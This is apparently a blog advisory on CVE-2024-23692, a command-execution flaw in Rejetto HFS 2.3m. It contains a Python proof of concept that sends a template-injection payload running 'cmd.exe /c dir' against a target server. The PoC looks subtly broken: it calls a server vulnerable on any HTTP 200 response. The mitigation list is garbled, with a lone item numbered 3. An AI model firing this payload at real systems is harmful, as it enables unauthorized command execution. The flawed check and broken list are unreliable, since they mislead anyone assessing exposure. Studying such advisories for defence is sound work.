Rejetto HTTP File Server (HFS), a popular file-sharing application, has been found to contain a critical vulnerability (CVE-2024-23692) in versions up to and including 2.3m. This security flaw allows remote, unauthenticated attackers to execute arbitrary commands on the affected system using a specially crafted HTTP request. In this post, we will discuss the exploit details, examine a code snippet demonstrating the vulnerability, and provide links to original references. Lastly, we will discuss mitigation strategies for those who may still be using this unsupported software.

Exploit Details

The template injection vulnerability discovered in Rejetto HFS 2.3m affects the application's handling of user-controlled data in its template rendering process. Attackers can craft an HTTP request with malicious input, which will be processed and executed directly on the host system. This allows attackers to execute arbitrary commands, leading to unauthorized access or potential data loss.

The following PoC code snippet demonstrates the vulnerability

import requests

target = "http://target-server-ip:808/";

# Specially crafted HTTP request using '|" as a delimiter
payload = "%{.exec|cmd.exe /c dir.}" 

headers = {
  "Content-Type": "application/x-www-form-urlencoded"
}

response = requests.post(target, data=payload, headers=headers)

if response.status_code == 200:
    print("Vulnerable")

else:
    print("Not vulnerable")

The above code snippet sends an HTTP request to a server with the vulnerable version of Rejetto HFS. The payload consists of a delimiter '|' followed by an arbitrary command. If the server is vulnerable, it will execute the command and return a positive response.

Original References

1. Rejetto HFS Official Repository
2. CVE-2024-23692 NVD Entry
3. Exploit-DB: Rejetto HFS 2.3m - Template Injection

Mitigation

As Rejetto HFS 2.3m is no longer supported, there are no official patches or updates to address this vulnerability. However, users have the following options to mitigate the risk:

Implement a Web Application Firewall (WAF) with specific rules to filter out malicious payloads.

3. Consider upgrading to a more recent, supported version of Rejetto HFS or an alternative file server application.

Conclusion

The Rejetto HFS 2.3m template injection vulnerability (CVE-2024-23692), while no longer officially supported, can still pose a significant risk to users who continue to utilize this software. Understanding the details of this vulnerability and employing effective mitigation strategies is crucial in safeguarding against potential exploitation.

Timeline

Published on: 05/31/2024 10:15:09 UTC
Last modified on: 08/01/2024 23:15:46 UTC